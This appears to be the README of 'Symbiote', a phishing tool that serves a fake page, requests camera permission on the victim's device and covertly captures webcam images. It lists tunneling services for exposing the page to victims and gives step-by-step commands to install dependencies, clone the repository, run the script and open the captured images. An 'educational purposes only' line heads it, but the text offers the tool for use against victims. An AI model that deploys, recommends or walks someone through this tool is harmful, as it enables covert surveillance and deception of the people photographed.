#TO BE USED FOR EDUCATIONAL PURPOSES ONLY#
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. By requesting camera permission on the victim's device, this script can take pictures covertly. If you're interested in contributing to the project, we'd love to have you on board.
- NGROK [ACCOUNT NEEDED] (https://ngrok.com)
- Localhost.run (http://localhost.run)
- LOCALXPOSE [ACCOUNT NEEDED] (https://localxpose.io)
sudo apt update && upgrade
sudo apt install python -y
sudo apt install wget -y
sudo apt install php -y
sudo apt install openssh-client -y
sudo apt install jq -y
sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1
git clone https://github.com/hasanfirnas/symbiote
cd symbiote
python3 symbiote.py
cd symbiote
cd CapturedData
ls
termux-open <file_name>
- Python 3
- PHP
- wget